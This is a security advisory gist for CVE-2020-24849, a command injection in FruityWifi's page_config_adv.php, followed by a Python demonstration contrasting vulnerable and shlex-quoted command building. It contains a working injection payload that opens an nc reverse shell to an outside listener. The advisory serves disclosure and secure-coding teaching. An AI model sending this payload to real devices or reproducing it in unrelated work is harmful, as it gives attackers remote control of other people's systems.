Gist harsh-bothra/f899045b16bbba264628d79d52c07c22, last active November 3, 2020 09:20
CVE-2020-24849 - FruityWifi Remote Code Execution
Product: FruityWifi
CVE: CVE-2020-24849
Version: all versions through 2.4 (tested on version 2.4)
Vulnerability: Remote Code Execution (authenticated)
Vulnerability Description: A remote code execution vulnerability was identified in FruityWifi through 2.4. Shell metacharacters taken from the POST request to the page_config_adv.php page are not properly escaped before the value reaches a shell, so an authenticated attacker can execute arbitrary commands on the device. This is similar to CVE-2018-17317.
# Steps to Reproduce:
1. Log in to the application with valid credentials.
2. Go to "https://vuln_ip/scripts/page_config_adv.php".
3. Intercept the request and change the request method to POST.
4. Start an nc listener on port 4441, then add a "newSSID" parameter to the POST body with the payload: newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#
Note: The leading A\"B'C" part of the payload closes the quoting that surrounds the injected value on the server side; the ";" that follows starts a new command, and the trailing "#" comments out the remainder of the original command line. Send the request and the listener receives an interactive shell.
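The following is an added illustration, not part of the original advisory or of FruityWifi's code. It decodes the advisory's newSSID payload the way PHP fills $_POST, interpolates it into a hypothetical double-quoted shell command (the command template is an assumption standing in for whatever page_config_adv.php builds; the actual FruityWifi source is not shown on this page), and tokenises the result like a POSIX shell to show how the quote-closing prefix turns one command into six. The hardened variant passes the same value through shlex.quote so the shell sees it as a single word; the still better fix is to not involve a shell at all and write the configuration file directly.

```python
import shlex
from urllib.parse import unquote_plus

# The newSSID value exactly as it appears in the advisory's POST body (URL-encoded).
ADVISORY_PAYLOAD = (
    'A\\"B\'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261'
    '|nc+192.168.56.1+4441+>/tmp/f;#'
)

# Shell tokens that end one simple command and start the next.
SEPARATORS = {";", "|", "&", "&&", "||"}


def decode_post_value(raw: str) -> str:
    """Decode a form-encoded value the way PHP does when it populates $_POST
    ('+' becomes a space, %3b becomes ';', %26 becomes '&')."""
    return unquote_plus(raw)


def build_command_vulnerable(ssid: str) -> str:
    """Hypothetical vulnerable pattern (an assumption, NOT FruityWifi's actual code):
    the untrusted SSID is interpolated into a double-quoted shell string."""
    return f'echo "ssid={ssid}" > /tmp/hostapd.conf'


def build_command_hardened(ssid: str) -> str:
    """Same command with the untrusted value wrapped by shlex.quote, so every
    quote, ';' and '|' inside it is literal data rather than shell syntax."""
    return f"echo ssid={shlex.quote(ssid)} > /tmp/hostapd.conf"


def shell_words(command: str) -> list:
    """Tokenise like a POSIX shell: honours single/double quotes, backslash
    escapes inside double quotes, '#' comments, and splits ; | & into tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def simple_commands(command: str) -> list:
    """Group the tokens into the simple commands the shell would actually run."""
    groups, current = [], []
    for tok in shell_words(command):
        if tok in SEPARATORS:
            if current:
                groups.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        groups.append(current)
    return groups


def command_names(command: str) -> list:
    """Program name of each simple command; more than one means the injection worked."""
    return [group[0] for group in simple_commands(command)]


if __name__ == "__main__":
    ssid = decode_post_value(ADVISORY_PAYLOAD)
    print("decoded newSSID:", ssid)
    for label, builder in (("vulnerable", build_command_vulnerable),
                           ("hardened", build_command_hardened)):
        cmd = builder(ssid)
        print(f"\n[{label}] {cmd}")
        for group in simple_commands(cmd):
            print("   runs:", group)
```

Run stand-alone, the vulnerable template yields echo, rm, mkfifo, cat, /bin/sh and nc as separate commands (the reverse-shell pipeline from the advisory), with the original "> /tmp/hostapd.conf" redirection swallowed by the trailing "#". The hardened template yields a single echo whose second argument is the entire payload verbatim.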